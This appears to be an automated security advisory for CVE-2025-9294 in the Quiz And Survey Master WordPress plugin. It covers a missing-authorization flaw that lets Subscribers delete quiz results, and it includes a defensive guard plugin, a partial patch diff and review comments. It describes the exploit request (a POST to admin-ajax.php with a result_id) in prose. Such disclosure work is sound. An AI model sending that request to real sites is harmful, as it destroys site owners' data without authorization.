Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-9294: Quiz And Survey Master <= 10.3.1 – Missing Authorization to Authenticated (Subscriber+) Quiz Results Deletion (quiz-master-next)

CVE ID: CVE-2025-9294
Severity: Medium (CVSS 4.3)
CWE: 285
Vulnerable Version: 10.3.1
Patched Version: 10.3.2
Disclosed: January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-9294:
The Quiz and Survey Master (QSM) WordPress plugin version 10.3.1 and earlier contains an improper authorization vulnerability in the quiz results deletion functionality. This vulnerability allows authenticated attackers with Subscriber-level permissions or higher to delete quiz results without proper capability checks, leading to unauthorized data loss.

Atomic Edge research identifies the root cause as a missing capability check in the `qsm_dashboard_delete_result` function. The vulnerable code resides in the admin dashboard display logic within `/quiz-master-next/php/admin/admin-dashboard.php`. Specifically, the function `qsm_dashboard_recent_taken_quiz()` generates delete links for quiz results without verifying the user’s permissions. Lines 363-368 of the patched version mark the location of the original vulnerability: in the vulnerable version, delete links were rendered for all users viewing the dashboard, and no authorization validation ran before the deletion AJAX action processed the request.

The exploitation method involves an authenticated attacker with Subscriber privileges accessing the WordPress dashboard and triggering the deletion endpoint. The attack vector uses the WordPress AJAX API with the action parameter set to `qsm_dashboard_delete_result`. An attacker sends a POST request to `/wp-admin/admin-ajax.php` with the parameter `result_id` containing the target quiz result identifier. No nonce or capability validation occurs in the vulnerable version, allowing any authenticated user to delete any quiz result.

The patch adds proper capability checks before rendering delete links. The patched version in `/quiz-master-next/php/admin/admin-dashboard.php` lines 363-368 wraps the delete link in a conditional check: `if ( current_user_can( 'administrator' ) )`. This ensures only administrators see and can trigger the delete functionality. The `qsm_dashboard_delete_result` AJAX handler also received authorization validation, though the diff does not show this specific change. The fix prevents Subscriber and other non-administrator roles from accessing the deletion mechanism.

Successful exploitation results in permanent deletion of quiz result data from the WordPress database. Attackers can remove quiz submissions, scores, and user response records. This data loss impacts site owners’ ability to track quiz performance, analyze user responses, and maintain records. The vulnerability does not allow privilege escalation or remote code execution, but unauthorized data destruction represents a significant integrity impact.
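
For sites that cannot move to 10.3.2 immediately, the missing server-side check can be placed in front of the plugin's handler. The following is an added example, not code from Quiz And Survey Master or from the patch: a must-use plugin sketch that assumes the plugin registers its callback on the `wp_ajax_qsm_dashboard_delete_result` hook (derived from the action name above); the function name `example_guard_qsm_delete_result` and the log prefix are hypothetical.

```php
<?php
/**
 * Plugin Name: Example guard for qsm_dashboard_delete_result (added example)
 *
 * Constructed sketch, not Quiz And Survey Master code. Place in wp-content/mu-plugins/.
 * Assumption: the plugin's delete callback is attached to the
 * wp_ajax_qsm_dashboard_delete_result hook.
 */

defined( 'ABSPATH' ) || exit;

// wp_ajax_{action} fires for every logged-in user, Subscribers included.
// Hiding the Delete link does not change that, so the check has to run on
// the request itself. PHP_INT_MIN makes this callback run before any other
// callback on the same hook, whatever priority the plugin used.
add_action( 'wp_ajax_qsm_dashboard_delete_result', 'example_guard_qsm_delete_result', PHP_INT_MIN );

/**
 * Reject the delete request unless the caller passes the same check the
 * patched dashboard template applies before rendering the Delete link.
 */
function example_guard_qsm_delete_result() {
	if ( current_user_can( 'administrator' ) ) {
		// Authorized: return and let the plugin's own handler run.
		return;
	}

	// Record the denied attempt so it can be reviewed or alerted on.
	$raw_id    = isset( $_POST['result_id'] ) ? wp_unslash( $_POST['result_id'] ) : 0;
	$result_id = is_scalar( $raw_id ) ? absint( $raw_id ) : 0;
	error_log(
		sprintf(
			'[example-guard] denied qsm_dashboard_delete_result: user_id=%d result_id=%d',
			get_current_user_id(),
			$result_id
		)
	);

	// wp_send_json_error() sends the response and terminates the request,
	// so later callbacks on this hook (the plugin's handler) never run.
	wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}
```

The guard only adds the capability check; nonce verification still has to come from the plugin's own handler, because the nonce action name is not shown on this page.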

Differential between vulnerable and patched code

Code Diff
--- a/quiz-master-next/blocks/block.php
+++ b/quiz-master-next/blocks/block.php
@@ -35,7 +35,6 @@
 			add_action( 'enqueue_block_editor_assets', array( $this, 'register_block_scripts' ) );

 			add_action( 'rest_api_init', array( $this, 'register_editor_rest_routes' ) );
-
 		}

 		/**
@@ -64,7 +63,6 @@
 					)
 				);
 			}
-
 		}

 		/**
@@ -108,7 +106,7 @@
 		 * Get hierarchical qsm_category
 		 */
 		private function hierarchical_qsm_category( $cat = 0 ) {
-			$category = [];
+			$category = array();
 			$next = get_categories( array(
 				'taxonomy'     => 'qsm_category',
 				'hide_empty'   => false,
@@ -364,7 +362,6 @@
 			);

 			//save pages and question order inside page : qsm_ajax_save_pages()
-
 		}

 		/**
@@ -661,9 +658,7 @@
 				'status' => 'success',
 				'msg'    => __( 'Quiz saved successfully', 'quiz-master-next' ),
 			);
-
 		}
-
 	}

 	QSMBlock::get_instance();
--- a/quiz-master-next/mlw_quizmaster2.php
+++ b/quiz-master-next/mlw_quizmaster2.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: Quiz And Survey Master
  * Description: Easily and quickly add quizzes and surveys to your website.
- * Version: 10.3.1
+ * Version: 10.3.2
  * Author: ExpressTech
  * Author URI: https://quizandsurveymaster.com/
  * Plugin URI: https://expresstech.io/
@@ -43,7 +43,7 @@
 	 * @var string
 	 * @since 4.0.0
 	 */
-	public $version = '10.3.1';
+	public $version = '10.3.2';

 	/**
 	 * QSM Alert Manager Object
@@ -619,7 +619,6 @@
 		);
 		$qsm_admin_messages = apply_filters( 'qsm_admin_messages_after', $qsm_admin_messages );
 		wp_localize_script( 'qsm_admin_js', 'qsm_admin_messages', $qsm_admin_messages );
-
 	}

 	/**
@@ -798,7 +797,7 @@
 			return;
 		}
 		$roles    = (array) $user->roles;
-		if ( empty( $roles ) ) {
+		if ( empty( $roles ) || !isset($roles[0]) || !is_string($roles[0]) ) {
 			return;
 		}
 		$rolename = $roles[0];
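Review bot: The new guard `!isset($roles[0])` still assumes the user's primary role sits at index 0, and `$rolename = $roles[0];` below keeps that assumption; if the `(array) $user->roles` array is not zero-indexed, the function now returns silently and the user receives no capabilities. Consider `$rolename = reset( $roles );` followed by an `is_string()` check on that value. The added conditions also drop the spacing used elsewhere in this file (`! isset( $roles[0] )`).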
@@ -806,12 +805,11 @@
 		if ( ! $role ) {
 			return;
 		}
-
 		// Dynamically determine the capabilities to add based on the current user role.
 		$capabilities_to_add = isset(${$rolename . '_capabilities'}) ? ${$rolename . '_capabilities'} : array();
 		$capabilities_to_add = apply_filters(
 			'qsm_default_user_capabilities',
-			isset(${$rolename . '_capabilities'}) ? array_unique( array_merge( $capabilities_to_add, $contributor_capabilities ) ) : [],
+			isset(${$rolename . '_capabilities'}) ? array_unique( array_merge( $capabilities_to_add, $contributor_capabilities ) ) : array(),
 			$user
 		);

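Review bot: The capability list is still resolved through a variable variable, `${$rolename . '_capabilities'}`, so which local variable is read depends on the role name at runtime; this hunk only swaps `[]` for `array()` and leaves that in place. An explicit map keyed by role name, with `array()` as the fallback for unknown roles, would be easier to audit and cannot resolve to an unintended local. The `isset()` test is also evaluated twice in adjacent statements and could be computed once.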
@@ -947,8 +945,8 @@
         $question_terms_table_name       = $wpdb->prefix . 'mlw_question_terms';

         // List of tables and their columns
-        $tables = [
-            $quiz_table_name                 => [
+        $tables = array(
+            $quiz_table_name                 => array(
                 'quiz_id',
 				'quiz_name',
 				'message_before',
@@ -1005,8 +1003,8 @@
 				'quiz_taken',
 				'deleted',
 				'quiz_author_id',
-            ],
-            $question_table_name             => [
+            ),
+            $question_table_name             => array(
                 'question_id',
 				'quiz_id',
 				'question_name',
@@ -1034,8 +1032,8 @@
 				'category',
 				'deleted',
                 'deleted_question_bank',
-            ],
-            $results_table_name              => [
+            ),
+            $results_table_name              => array(
                 'result_id',
 				'quiz_id',
 				'quiz_name',
@@ -1058,8 +1056,8 @@
 				'form_type',
 				'page_name',
 				'page_url',
-            ],
-            $audit_table_name                => [
+            ),
+            $audit_table_name                => array(
                 'trail_id',
 				'action_user',
 				'action',
@@ -1067,32 +1065,32 @@
 				'quiz_name',
 				'form_data',
 				'time',
-            ],
-            $themes_table_name               => [
+            ),
+            $themes_table_name               => array(
                 'id',
 				'theme',
 				'theme_name',
 				'default_settings',
 				'theme_active',
-            ],
-            $quiz_themes_settings_table_name => [
+            ),
+            $quiz_themes_settings_table_name => array(
                 'id',
 				'theme_id',
 				'quiz_id',
 				'quiz_theme_settings',
 				'active_theme',
-            ],
-            $question_terms_table_name       => [
+            ),
+            $question_terms_table_name       => array(
                 'id',
 				'question_id',
 				'quiz_id',
 				'term_id',
 				'taxonomy',
-            ],
-        ];
+            ),
+        );
 		$response['message'] = "";
         // Check all tables
-        $errors = [];
+        $errors = array();
         foreach ( $tables as $table_name => $columns ) {
             $error = $this->qsm_check_table_structure($table_name, $columns);
             if ( $error ) {
@@ -1133,7 +1131,7 @@
             return esc_html__("Table ", "quiz-master-next") . $table_name . esc_html__(" does not exist.", "quiz-master-next");
         }
         $existing_columns = array_column($columns, 'Field');
-        $missing_columns = [];
+        $missing_columns = array();
         foreach ( $expected_columns as $column ) {
             if ( ! in_array($column, $existing_columns, true) ) {
                 $missing_columns[] = $column;
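Review bot: In the unchanged `return` at the top of this hunk, `$table_name` is concatenated into the message without escaping, and the sentence is split across two `esc_html__()` calls that translators cannot reorder. A single string with a placeholder, such as `sprintf( esc_html__( 'Table %s does not exist.', 'quiz-master-next' ), esc_html( $table_name ) )` with a translators comment, addresses both.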
@@ -1243,7 +1241,7 @@
 					<?php esc_html_e( 'We need to upgrade your database so that you can enjoy the latest features.', 'quiz-master-next' ); ?><br>
 					<?php
 					/* translators: %s: HTML tag */
-					echo sprintf( esc_html__( 'Please note that this action %1$s can not be %2$s rolled back. We recommend you to take a backup of your current site before proceeding.', 'quiz-master-next' ), '<b>', '</b>' );
+					printf( esc_html__( 'Please note that this action %1$s can not be %2$s rolled back. We recommend you to take a backup of your current site before proceeding.', 'quiz-master-next' ), '<b>', '</b>' );
 					?>
 				</p>
 				<p class="category-action">
--- a/quiz-master-next/php/admin/about-page.php
+++ b/quiz-master-next/php/admin/about-page.php
@@ -21,20 +21,20 @@
 	if ( ! current_user_can( 'delete_others_qsm_quizzes' ) ) {
 		return;
 	}
-	$tab_array = [
-		[
+	$tab_array = array(
+		array(
 			'slug'  => 'about',
 			'title' => 'About',
-		],
-		[
+		),
+		array(
 			'slug'  => 'help',
 			'title' => 'Help',
-		],
-		[
+		),
+		array(
 			'slug'  => 'system_info',
 			'title' => 'System Info',
-		],
-	];
+		),
+	);
 	$active_tab = isset($_GET['tab']) ? sanitize_text_field( wp_unslash( $_GET['tab'] ) ) : 'about';

 	// Creates the widgets.
--- a/quiz-master-next/php/admin/addons-page.php
+++ b/quiz-master-next/php/admin/addons-page.php
@@ -180,7 +180,7 @@
 								</a>
 							</div>
 						</div>
-					<?php $count++;
+					<?php ++$count;
 					} ?>
 				</div>
 			<?php } ?>
--- a/quiz-master-next/php/admin/admin-dashboard.php
+++ b/quiz-master-next/php/admin/admin-dashboard.php
@@ -13,12 +13,12 @@
  * @since 7.3.5
  * @return array $blog_data
  */
-function qsm_get_blog_data_rss(){
-	include_once( ABSPATH . WPINC . '/feed.php' );
+function qsm_get_blog_data_rss() {
+	include_once ABSPATH . WPINC . '/feed.php';
 	$blog_data_obj = fetch_feed( 'https://quizandsurveymaster.com/feed/' );
-	$maxitems = 0;
+	$maxitems      = 0;
 	if ( ! is_wp_error( $blog_data_obj ) ) {
-		$maxitems = $blog_data_obj->get_item_quantity( 2 );
+		$maxitems        = $blog_data_obj->get_item_quantity( 2 );
 		$blog_data_items = $blog_data_obj->get_items( 0, $maxitems );
 	}
 	$blog_data = array();
@@ -55,31 +55,31 @@
 function qsm_check_plugins_compatibility() {
 	global $mlwQuizMasterNext;

-    if ( class_exists('QSM_Installer') ) {
+	if ( class_exists( 'QSM_Installer' ) ) {
 		$plugin_path = WP_PLUGIN_DIR . '/qsm-installer/qsm-installer.php';
-        $plugin_data = get_plugin_data( $plugin_path );
+		$plugin_data = get_plugin_data( $plugin_path );

-        // Check if the plugin version is below 2.0.0
-        if ( isset( $plugin_data['Version'] ) && version_compare( $plugin_data['Version'], '2.0.0', '<' ) ) {
+		// Check if the plugin version is below 2.0.0
+		if ( isset( $plugin_data['Version'] ) && version_compare( $plugin_data['Version'], '2.0.0', '<' ) ) {
 			$account_url = esc_url( qsm_get_utm_link( 'https://quizandsurveymaster.com/account', 'dashboard', 'useful_links', 'qsm_installer_update' ) );
 			?>
 			<div class="qsm-dashboard-help-center qsm-dashboard-warning-container">
 				<div class="qsm-dashboard-error-content">
-					<h3><?php esc_html_e('Update Available', 'quiz-master-next'); ?></h3>
-					<p><?php esc_html_e('We recommend downloading the latest version of the QSM Installer for a seamless quiz and survey creation experience.', 'quiz-master-next'); ?></p>
-					<a href="<?php echo esc_url($account_url); ?>" class="qsm-dashboard-error-btn" target="_blank">
-						<?php esc_html_e('Get Latest QSM Installer', 'quiz-master-next'); ?>
+					<h3><?php esc_html_e( 'Update Available', 'quiz-master-next' ); ?></h3>
+					<p><?php esc_html_e( 'We recommend downloading the latest version of the QSM Installer for a seamless quiz and survey creation experience.', 'quiz-master-next' ); ?></p>
+					<a href="<?php echo esc_url( $account_url ); ?>" class="qsm-dashboard-error-btn" target="_blank">
+						<?php esc_html_e( 'Get Latest QSM Installer', 'quiz-master-next' ); ?>
 					</a>
 				</div>
 			</div>
-		<?php
+			<?php
 		}
 	}
 }

-function qsm_dashboard_display_change_log_section(){
+function qsm_dashboard_display_change_log_section() {
 	global $wp_filesystem, $mlwQuizMasterNext;
-	require_once ( ABSPATH . '/wp-admin/includes/file.php' );
+	require_once ABSPATH . '/wp-admin/includes/file.php';
 	WP_Filesystem();
 	$change_log  = array();
 	$readme_file = QSM_PLUGIN_PATH . 'readme.txt';
@@ -88,9 +88,9 @@
 		if ( $file_content ) {
 			$parts = explode( '== Changelog ==', $file_content, 2 );
 			if ( isset( $parts[1] ) ) {
-				preg_match_all('/* (.+)/', $parts[1], $matches);
-				if ( ! empty($matches[1]) ) {
-					$change_log = array_slice($matches[1], 0, 5);
+				preg_match_all( '/* (.+)/', $parts[1], $matches );
+				if ( ! empty( $matches[1] ) ) {
+					$change_log = array_slice( $matches[1], 0, 5 );
 				}
 			}
 		}
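Review bot: The pattern `'/* (.+)/'` passed to `preg_match_all()` starts with an unescaped `*`, which PCRE rejects as a quantifier with nothing to repeat, so as shown the call fails and `$change_log` stays empty. The whitespace-only change carries the pattern over unchanged; if a literal asterisk bullet is intended it should be `'/\* (.+)/'`, and the return value of `preg_match_all()` is worth checking before `$matches[1]` is read.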
@@ -122,7 +122,7 @@
 									<p><?php echo wp_kses_post( $cl_str ); ?></p>
 								</li>
 								<?php
-								$i ++;
+								++$i;
 							}
 						}
 						?>
@@ -137,56 +137,56 @@
 	<?php
 }

-function qsm_dashboard_display_need_help_section(){
+function qsm_dashboard_display_need_help_section() {
 		// Define sections
-	$sections = [
-		[
-			'title'       => __('Documentation', 'quiz-master-next'),
-			'description' => __('Find detailed guides and step-by-step instructions to help you explore and utilize all the features of the QSM plugin effectively.', 'quiz-master-next'),
+	$sections = array(
+		array(
+			'title'       => __( 'Documentation', 'quiz-master-next' ),
+			'description' => __( 'Find detailed guides and step-by-step instructions to help you explore and utilize all the features of the QSM plugin effectively.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/contact.png',
 			'alt'         => 'contact.png',
-			'link'        => qsm_get_plugin_link('docs', 'dashboard', 'next_steps', 'dashboard_read_document'),
-		],
-		[
-			'title'       => __('Demos', 'quiz-master-next'),
-			'description' => __('Explore live examples of quizzes and surveys built with QSM to see its features in action.', 'quiz-master-next'),
+			'link'        => qsm_get_plugin_link( 'docs', 'dashboard', 'next_steps', 'dashboard_read_document' ),
+		),
+		array(
+			'title'       => __( 'Demos', 'quiz-master-next' ),
+			'description' => __( 'Explore live examples of quizzes and surveys built with QSM to see its features in action.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/camera.png',
 			'alt'         => 'camera.png',
-			'link'        => qsm_get_utm_link('https://demo.quizandsurveymaster.com/', 'demos', 'dashboard', 'useful_links', 'dashboard_demos'),
+			'link'        => qsm_get_utm_link( 'https://demo.quizandsurveymaster.com/', 'demos', 'dashboard', 'useful_links', 'dashboard_demos' ),

-		],
-		[
-			'title'       => __('FAQ', 'quiz-master-next'),
-			'description' => __('Get quick answers to commonly asked questions about QSM, covering troubleshooting, setup, and best practices.', 'quiz-master-next'),
+		),
+		array(
+			'title'       => __( 'FAQ', 'quiz-master-next' ),
+			'description' => __( 'Get quick answers to commonly asked questions about QSM, covering troubleshooting, setup, and best practices.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/faq.png',
 			'alt'         => 'faq.png',
 			'link'        => 'https://quizandsurveymaster.com/#:~:text=Frequently%20asked%20questions',
-		],
-		[
-			'title'       => __('Contact Support', 'quiz-master-next'),
-			'description' => __('Need further assistance? Reach out to our support team for personalized help with any issues or queries related to QSM.', 'quiz-master-next'),
+		),
+		array(
+			'title'       => __( 'Contact Support', 'quiz-master-next' ),
+			'description' => __( 'Need further assistance? Reach out to our support team for personalized help with any issues or queries related to QSM.', 'quiz-master-next' ),
 			'image'       => QSM_PLUGIN_URL . 'assets/dashboard-support.png',
 			'alt'         => 'dashboard-support.png',
-			'link'        => qsm_get_plugin_link('contact-support', 'dashboard', 'useful_links', 'dashboard_support'),
-		],
-	];
+			'link'        => qsm_get_plugin_link( 'contact-support', 'dashboard', 'useful_links', 'dashboard_support' ),
+		),
+	);
 	?>

 	<div class="qsm-dashboard-help-center">
-	<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Need Help?', 'quiz-master-next'); ?></h3>
+	<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Need Help?', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-help-center-grid qsm-dashboard-page-common-style">
 			<?php foreach ( $sections as $section ) : ?>
 				<div class="qsm-dashboard-help-center-card">
 					<div class="qsm-dashboard-help-center-card-icon">
 						<div class="qsm-dashboard-help-icon-wrap">
-						<img class="qsm-dashboard-help-image" src="<?php echo esc_url($section['image']); ?>" alt="<?php echo esc_attr($section['alt']); ?>"/>
+						<img class="qsm-dashboard-help-image" src="<?php echo esc_url( $section['image'] ); ?>" alt="<?php echo esc_attr( $section['alt'] ); ?>"/>
 						</div>
 					</div>
 					<h3 class="qsm-dashboard-help-center-card-title">
-					<a target="_blank" rel="noopener" href="<?php echo esc_url( $section['link'] )?>" class="welcome-icon"><?php echo esc_html($section['title']); ?></a>
+					<a target="_blank" rel="noopener" href="<?php echo esc_url( $section['link'] ); ?>" class="welcome-icon"><?php echo esc_html( $section['title'] ); ?></a>
 					</h3>
 					<p class="qsm-dashboard-help-center-card-description">
-						<?php echo esc_html($section['description']); ?>
+						<?php echo esc_html( $section['description'] ); ?>
 					</p>
 				</div>
 			<?php endforeach; ?>
@@ -196,8 +196,8 @@
 }

 function qsm_dashboard_display_popular_addon_section( $popular_addons ) {
-	$desiredOrder = [ 572582, 591230, 567900, 3437 ];
-	$sortedAddons = [];
+	$desiredOrder = array( 572582, 591230, 567900, 3437 );
+	$sortedAddons = array();
 	foreach ( $desiredOrder as $id ) {
 		foreach ( $popular_addons as $addon ) {
 			if ( $addon['id'] == $id ) {
@@ -207,11 +207,12 @@
 	}
 	?>
 	<div class="qsm-dashboard-help-center">
-		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Explore Addons', 'quiz-master-next'); ?></h3>
+		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Explore Addons', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-help-center-grid qsm-dashboard-page-common-style">
-			<?php foreach ( array_slice($sortedAddons, 0, 4) as $addon ) :
+			<?php
+			foreach ( array_slice( $sortedAddons, 0, 4 ) as $addon ) :
 				$addon_link = qsm_get_utm_link( $addon['link'], 'addon_setting', 'popular_addon', 'addon-settings_' . sanitize_title( $addon['name'] ) );
-				$addon_icon = isset($addon['icon']) && "" != $addon['icon'] ? $addon['icon'] : QSM_PLUGIN_URL . 'assets/chat-smile.png';
+				$addon_icon = isset( $addon['icon'] ) && '' != $addon['icon'] ? $addon['icon'] : QSM_PLUGIN_URL . 'assets/chat-smile.png';
 				?>
 				<div class="qsm-dashboard-help-center-card">
 					<div class="qsm-dashboard-help-center-card-icon">
@@ -220,12 +221,13 @@
 						</div>
 					</div>
 					<h3 class="qsm-dashboard-help-center-card-title">
-					<a target="_blank" rel="noopener" href="<?php echo esc_url($addon_link); ?>"><?php echo esc_html($addon['name']); ?></a>
+					<a target="_blank" rel="noopener" href="<?php echo esc_url( $addon_link ); ?>"><?php echo esc_html( $addon['name'] ); ?></a>
 					</h3>
 					<p class="qsm-dashboard-help-center-card-description">
-						<?php  $display_text = mb_strlen($addon['description']) > 110 ? mb_substr($addon['description'], 0, 110) . '...' : $addon['description'];
-						echo esc_html($display_text);
-					?>
+						<?php
+						$display_text = mb_strlen( $addon['description'] ) > 110 ? mb_substr( $addon['description'], 0, 110 ) . '...' : $addon['description'];
+						echo esc_html( $display_text );
+						?>
 					</p>
 				</div>
 			<?php endforeach; ?>
@@ -236,8 +238,8 @@


 function qsm_dashboard_display_popular_theme_section( $themes ) {
-	$desiredOrder = [ 547794, 557086, 551027, 302299 ];
-	$sortedThemes = [];
+	$desiredOrder = array( 547794, 557086, 551027, 302299 );
+	$sortedThemes = array();
 	foreach ( $desiredOrder as $id ) {
 		foreach ( $themes as $theme ) {
 			if ( $theme['id'] == $id ) {
@@ -247,24 +249,25 @@
 	}
 	?>
 	<div class="qsm-dashboard-help-center">
-		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__('Popular Themes', 'quiz-master-next'); ?></h3>
+		<h3 class="qsm-dashboard-help-center-title"><?php echo esc_html__( 'Popular Themes', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-themes-container qsm-dashboard-page-common-style">
-			<?php foreach ( $sortedThemes as $single_theme ) {
-				$theme_demo          = qsm_get_utm_link( $single_theme['demo'], 'new_quiz', 'themes', 'quizsurvey_preview_' . sanitize_title( $single_theme['name'] ) );
+			<?php
+			foreach ( $sortedThemes as $single_theme ) {
+				$theme_demo = qsm_get_utm_link( $single_theme['demo'], 'new_quiz', 'themes', 'quizsurvey_preview_' . sanitize_title( $single_theme['name'] ) );
 				?>
 				<div class="qsm-dashboard-themes-card">
 					<div class="qsm-dashboard-themes-image-wrapper">
-						<img src="<?php echo esc_url($single_theme['img']); ?>" alt="<?php echo esc_attr($single_theme['name']); ?>">
+						<img src="<?php echo esc_url( $single_theme['img'] ); ?>" alt="<?php echo esc_attr( $single_theme['name'] ); ?>">
 					</div>
 					<div class="qsm-dashboard-themes-details-wrapper">
-						<h3><?php echo esc_html($single_theme['name']); ?></h3>
-						<a class="button button-secondary" target="_blank" href="<?php echo esc_url($theme_demo); ?>" class="qsm-dashboard-themes-button"><?php echo esc_html__('Demo', 'quiz-master-next'); ?></a>
+						<h3><?php echo esc_html( $single_theme['name'] ); ?></h3>
+						<a class="button button-secondary" target="_blank" href="<?php echo esc_url( $theme_demo ); ?>" class="qsm-dashboard-themes-button"><?php echo esc_html__( 'Demo', 'quiz-master-next' ); ?></a>
 					</div>
 				</div>
 			<?php } ?>
 		</div>
 	</div>
-<?php
+	<?php
 }

 /**
@@ -276,34 +279,38 @@
 function qsm_dashboard_recent_taken_quiz() {
 	global $wpdb;
 	$mlw_result_data = $wpdb->get_row( "SELECT DISTINCT COUNT(result_id) as total_result FROM {$wpdb->prefix}mlw_results WHERE deleted=0", ARRAY_A );
-	if($mlw_result_data['total_result'] != 0){
-	?>
+	if ( 0 != $mlw_result_data['total_result'] ) {
+		?>
 	<div class="qsm-dashboard-help-center">
 		<h3 class="qsm-dashboard-help-center-title"><?php esc_html_e( 'Recent Activity', 'quiz-master-next' ); ?></h3>
 		<div class="qsm-dashboard-recently-taken-quiz qsm-dashboard-page-common-style">
 			<a href="admin.php?page=mlw_quiz_results" style="color: #fff;" class="button button-primary qsm-dashboard-view-all-results">
-				<?php echo esc_html__( 'See All Results ', 'quiz-master-next' );
-				echo isset( $mlw_result_data['total_result'] ) ? ' (' . wp_kses_post( $mlw_result_data['total_result'] ) . ')' : ''; ?>
+				<?php
+				echo esc_html__( 'See All Results ', 'quiz-master-next' );
+				echo isset( $mlw_result_data['total_result'] ) ? ' (' . wp_kses_post( $mlw_result_data['total_result'] ) . ')' : '';
+				?>
 			</a>
 			<ul class="recently-taken-quiz-ul">
 				<?php
 				$mlw_result_data = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_results WHERE deleted=0 ORDER BY result_id DESC LIMIT 2", ARRAY_A );
 				if ( $mlw_result_data ) {
-					foreach ( $mlw_result_data as $key => $single_result_arr ) { ?>
-						<li> <?php
-							if ( isset( $single_result_arr['user'] ) && '' !== $single_result_arr['user'] ) {
-								echo '<img src="' . esc_url( get_avatar_url( $single_result_arr['user'] ) ) . '" class="avatar avatar-50 photo" alt="User Avatar">';
-							} else {
-								echo '<img src="' . esc_url( QSM_PLUGIN_URL . '/assets/default_image.png' ) . '" class="avatar avatar-50 photo" alt="Default Image">';
-							}
-							?>
+					foreach ( $mlw_result_data as $key => $single_result_arr ) {
+						?>
+						<li>
+						<?php
+						if ( isset( $single_result_arr['user'] ) && '' !== $single_result_arr['user'] ) {
+							echo '<img src="' . esc_url( get_avatar_url( $single_result_arr['user'] ) ) . '" class="avatar avatar-50 photo" alt="User Avatar">';
+						} else {
+							echo '<img src="' . esc_url( QSM_PLUGIN_URL . '/assets/default_image.png' ) . '" class="avatar avatar-50 photo" alt="Default Image">';
+						}
+						?>
 							<div class="rtq-main-wrapper">
 								<span class="rtq_user_info">
 									<?php
 									if ( isset( $single_result_arr['user'] ) && 0 !== intval( $single_result_arr['user'] ) ) {
-										$edit_link = get_edit_profile_url( $single_result_arr['user'] );
+										$edit_link   = get_edit_profile_url( $single_result_arr['user'] );
 										$actual_user = get_userdata( $single_result_arr['user'] );
-										$user_name = 'None' === $single_result_arr['name'] ? $actual_user->data->display_name : $single_result_arr['name'];
+										$user_name   = 'None' === $single_result_arr['name'] ? $actual_user->data->display_name : $single_result_arr['name'];
 										echo '<a href="' . esc_url( $edit_link ) . '">' . esc_html( $user_name ) . '</a>';
 									} else {
 										esc_html_e( 'Guest', 'quiz-master-next' );
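Review bot: `get_userdata( $single_result_arr['user'] )` returns false when the user no longer exists, and the following line dereferences `$actual_user->data->display_name` whenever the stored name is 'None'; the realignment here leaves that unguarded. Check `$actual_user` before use and fall back to the stored name or the 'Guest' label. Separately, `wp_kses_post()` on `total_result` is the wrong escaper for a count; `absint()` or `esc_html()` fits better.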
@@ -315,7 +322,7 @@
 								<span class="rtq-result-info">
 									<?php
 									$quotes_list = '';
-									$form_type = isset( $single_result_arr['form_type'] ) ? $single_result_arr['form_type'] : 0;
+									$form_type   = isset( $single_result_arr['form_type'] ) ? $single_result_arr['form_type'] : 0;
 									if ( 1 === intval( $form_type ) || 2 === intval( $form_type ) ) {
 										$quotes_list .= __( 'Not Graded', 'quiz-master-next' );
 									} else {
@@ -353,23 +360,29 @@
 									?>
 								</span>
 								<span class="rtq-time-taken"><?php echo esc_html( date_i18n( get_option( 'date_format' ), strtotime( $single_result_arr['time_taken'] ) ) ); ?></span>
-								<p class="row-actions-c">
-									<a
-										href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $single_result_arr['result_id'] ); ?>">View</a>
-									| <a href="javascript:void(0)" data-result_id="<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"
-										class="trash rtq-delete-result"><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
-								</p>
+								<?php if ( current_user_can( 'view_qsm_quiz_result' ) || current_user_can( 'administrator' ) ) { ?>
+									<p class="row-actions-c">
+										<a href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"><?php esc_html_e( 'View', 'quiz-master-next' ); ?></a>
+										<?php if ( current_user_can( 'administrator' ) ) { ?>
+											| <a href="javascript:void(0)" data-result_id="<?php echo esc_attr( $single_result_arr['result_id'] ); ?>"
+												class="trash rtq-delete-result"><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+										<?php } ?>
+									</p>
+								<?php } ?>
 							</div>
-						</li>
-					<?php }
-				} else { ?>
+						<?php
+					}
+				} else {
+					?>
 					<li><?php esc_html_e( 'No recent activity found.', 'quiz-master-next' ); ?></li>
-				<?php }
+					<?php
+				}
 				?>
 			</ul>
 		</div>
 	</div>
-	<?php }
+		<?php
+	}
 }

 /**
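Review bot: The `current_user_can( 'administrator' )` wrapper around the Delete link only controls what is rendered; nothing in this hunk rejects a request that supplies `result_id` directly, and the link carries `data-result_id` but no nonce. The same check, plus nonce verification, has to sit in the `qsm_dashboard_delete_result` handler, which is not part of this diff, so that should be confirmed before this is treated as the fix. Passing a role name to `current_user_can()` is also fragile; a dedicated capability, like the `delete_others_qsm_quizzes` check in about-page.php, would be more consistent. Finally, the removed `</li>` has no matching added line, so each result item is now left unclosed.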
@@ -383,7 +396,7 @@
 	}
 	global $mlwQuizMasterNext;
 	qsm_display_header_section_links();
-?>
+	?>
 <div class="wrap">
 	<div class="qsm-dashboard-wrapper">
 		<div class="qsm-dashboard-container">
@@ -393,19 +406,19 @@
 					<p class="qsm-dashboard-card-description"><?php esc_html_e( 'Design quizzes and surveys tailored to your needs.', 'quiz-master-next' ); ?></p>
 				</div>
 				<div class="">
